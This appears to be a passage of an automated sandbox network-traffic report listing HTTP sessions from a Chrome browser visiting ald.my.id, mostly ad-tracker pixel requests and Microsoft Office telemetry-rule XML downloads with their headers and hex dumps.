                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC502INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Location: https://pippio.com/api/sync?pid=5324&_=2
                                                                                                                                                                                                                                                                                                                                                                          P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: pxrc=CIXBs7gGEgUI6EcQAA==; Path=/; Domain=rlcdn.com; Expires=Fri, 13 Dec 2024 09:12:37 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          61192.168.2.749798141.101.120.104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC504OUTGET /pv/?_a=v&_h=ald.my.id&_ss=1dqyail9op&_pv=1&_ls=0&_u1=1&_u3=1&_cc=us&_pl=d&_cbid=6lao&_cb=_dtspv.c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: t.dtscout.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: m=1; st=1; df=1728897155; l=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-T: 0.16
                                                                                                                                                                                                                                                                                                                                                                          X-C: 0
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 14 Oct 2024 09:12:36 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jj2FQ7bTI3jQGMaYMOitbCROi%2BxF%2BzYA7rfT4nRUkQoxKLxtaQNsnriQqQI6k4waxSrVKFczFRf7A6OAi8JpzhUpSWXbinnV2aYHxa3pUpgwmsXe4MPUfVS5ly01hVY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8d2672e53f3741f9-EWR
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC57INData Raw: 33 33 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 31 31 37 22 7d 2c 27 36 6c 61 6f 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 33try{_dtspv.c({"b":"chrome@117"},'6lao');}catch(e){}
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          62192.168.2.74980267.202.105.314432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC960OUTGET /b/p?id=wu!&lm=0&ts=1728897155274&dn=AFWU&iso=0&pu=https%3A%2F%2Fald.my.id%2F&r=https%3A%2F%2Fald.my.id%2F&t=Csh%20Verify&chpv=10.0.0&chuav=Google%20Chrome%3Bv%3D117.0.5938.134%2C%20Not%3BA%3DBrand%3Bv%3D8.0.0.0%2C%20Chromium%3Bv%3D117.0.5938.134&chp=Windows&chmob=0&chua=Google%20Chrome%3Bv%3D117%2C%20Not%3BA%3DBrand%3Bv%3D8%2C%20Chromium%3Bv%3D117 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ic.tynt.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: uid=OY/j22cM4IWn+sRSNrMbgw==; pids=%5B%7B%22p%22%3A%220c1ae001bf%22%2C%22f%22%3A3%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%224bbb341d17%22%2C%22f%22%3A1%2C%22ts%22%3A1728897157218%7D%2C%7B%22p%22%3A%22e9b03986ff%22%2C%22f%22%3A2%2C%22ts%22%3A1728897157218%7D%5D
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC562INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          server: nginx/1.16.1
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          content-length: 35
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Fri, 16 Apr 2010 15:38:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          etag: "4bc8846c-23"
                                                                                                                                                                                                                                                                                                                                                                          cache-control: "no-store, no-cache, must-revalidate, post-check=0, pre-check=0, false"
                                                                                                                                                                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Model, Sec-CH-UA-Full-Version-List, Sec-CH-UA, Sec-CH-UA-Mobile
                                                                                                                                                                                                                                                                                                                                                                          expires: "Sat, 26 Jul 1997 05:00:00 GMT"
                                                                                                                                                                                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
                                                                                                                                                                                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC35INData Raw: 47 49 46 38 39 61 01 00 01 00 80 ff 00 ff ff ff 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          63192.168.2.74978613.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 499
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: f778f8da-901e-00a0-1117-1c6a6d000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cfvtw4hh2496wp8p800000004rg0000000001f1
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          64192.168.2.74978713.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: f7492d67-a01e-000d-0ae4-1ad1ea000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cf5mtxmr1c51513n000000006fg000000000e85
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          65192.168.2.74978513.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:37 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:37 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 428
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: ec733f58-401e-0035-529c-1b82d8000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091237Z-17db6f7c8cfcl4jvqfdxaxz9w800000003hg0000000068bh
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          66192.168.2.74978813.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 9dc98f41-601e-0097-4647-1cf33a000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cfmhggkx889x958tc00000003ag000000007cfx
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          67192.168.2.74979413.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 6ec52d65-901e-0083-299c-1bbb55000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cfgqlr45m385mnngs00000004mg00000000b723
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          68192.168.2.74980335.244.174.684432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC604OUTGET /361726.gif?n=1&33random=1728897157218.6 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: rc.rlcdn.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC620INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
